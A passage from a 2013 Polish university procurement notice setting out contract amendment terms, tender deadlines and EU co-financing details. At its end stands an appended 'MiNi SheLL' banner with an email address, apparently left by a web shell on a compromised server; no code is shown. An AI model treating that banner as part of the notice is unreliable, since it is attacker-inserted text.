-	roboty zaniechane przez które rozumie się roboty objęte pierwotną dokumentacją projektową,  a których wykonanie stało się zbędne. 
Zakres zmian zostanie stwierdzony przez Strony w protokole konieczności. 
1.2zmiany wynagrodzenia ryczałtowego w przypadku  zmiany sposobu świadczenia Wykonawcy na skutek okoliczności, o których mowa w pkt.1.1.  stwierdzonej aneksem do umowy: 
Podstawą do zmiany wynagrodzenia będzie protokół konieczności uzgodniony przez Strony oraz kosztorys różnicowy sporządzony przez Wykonawcę metodą szczegółową.
a)	Wartość robót zamiennych zostanie ustalona na podstawie protokołu konieczności uzgodnionego  przez Strony oraz kosztorysu różnicowego sporządzonego przez Wykonawcę metodą szczegółową przy czym cena robót zostanie obliczona w sposób określony poniżej:
-	stawka r-g, wskaźnik kosztów pośrednich i zysku - będą tożsame z wielkością tych składników cenowych zawartych w kosztorysie ofertowym,
-	ceny materiałów i sprzętu - według cen wskazanych w kosztorysie ofertowym, 
a w przypadku, gdy kosztorys ofertowy takiego rodzaju cen nie zawiera według średnich cen rynkowych udokumentowanych przez Wykonawcę na dzień sporządzania kosztorysu różnicowego. Przez udokumentowanie cen rynkowych Zamawiający uznaje zgromadzenie i przedłożenie Zamawiającemu do wglądu co najmniej dwóch cenników z alternatywnych źródeł zakupów materiału i pracy sprzętu. 
b)	Kosztorys różnicowy sporządzony przy uwzględnieniu treści pkt a)  po uprzednim jego sprawdzeniu i zatwierdzeniu przez Zamawiającego, będzie stanowił podstawę zmiany wynagrodzenia.
c)	Wartość robót zaniechanych zostanie ustalona  na podstawie protokołu konieczności uzgodnionego przez Strony oraz kosztorysu sporządzonego przez Wykonawcę metodą szczegółową, tj. określającego ilość jednostek przedmiarowych zakresu robót podlegających zaniechaniu, ceny jednostkowe wynikające z kosztorysu ofertowego, stanowiącego podstawę obliczenia ceny w ofercie. Tak sporządzony kosztorys po uprzednim jego sprawdzeniu i zatwierdzeniu przez Zamawiającego będzie podstawą do zmniejszenia wynagrodzenia Wykonawcy. 
1.3 zmiany terminu wykonania przedmiotu umowy w przypadku: 
a)	pisemnego żądania wstrzymania prac skierowanego do Wykonawcy przez Zamawiającego  wydania zakazu prowadzenia prac  przez właściwy organ administracji o ile  żądanie lub wydanie  nie nastąpiło z przyczyn  za które  Wykonawca  ponosi odpowiedzialność,   
b)	wystąpienia  okoliczności siły wyższej rozumianej jako zdarzenie niezależne od żadnej ze stron, które nastąpiło po  zawarciu umowy, a którego strony nie były w stanie przewidzieć w momencie jej zawierania i którego zaistnienie lub skutki uniemożliwiają wykonanie niniejszej umowy zgodnie z jej treścią. Strona powołująca się na okoliczności siły wyższej jest zobowiązana do niezwłocznego pisemnego powiadomienia drugiej strony, a następnie udokumentowania zaistnienia tego stanu, 
c)	istotnej zmiany sposobu świadczenia Wykonawcy stwierdzonej aneksem do umowy, która będzie miała wpływ na zmianę terminu zakończenia wykonania przedmiotu umowy. 
2. Zmiana umowy może zostać dokonana wyłącznie w formie pisemnego aneksu pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.tu.kielce.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Politechnika Świętokrzyska w Kielcach, Aleja Tysiąclecia Państwa Polskiego nr 7, 25-314 Kielce, Budynek B, pokój nr 2.33 (Dział Zamówień Publicznych)..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.06.2013 godzina 12:00, miejsce: Politechnika Świętokrzyska w Kielcach, Aleja Tysiąclecia Państwa Polskiego nr 7, 25-314 Kielce, Budynek B, pokój nr 2.33 (Dział Zamówień Publicznych)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> MODERNIZACJA I ROZWÓJ INFRASTRUKTURY DYDAKTYCZNO-BADAWCZEJ DLA INNOWACYJNEGO KSZTAŁCENIA NA KIERUNKU TRANSPORT współfinansowanego ze środków Unii Europejskiej w ramach Regionalnego Programu Operacyjnego Województwa Świętokrzyskiego na lata 2007-2013 oś priorytetowa 2. - Wsparcie innowacyjności, budowa społeczeństwa informacyjnego oraz wzrost potencjału inwestycyjnego regionu, działanie 2.1 - Rozwój innowacji, wspieranie działalności dydaktycznej i badawczej szkół wyższych oraz placówek sektora badania i rozwój.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com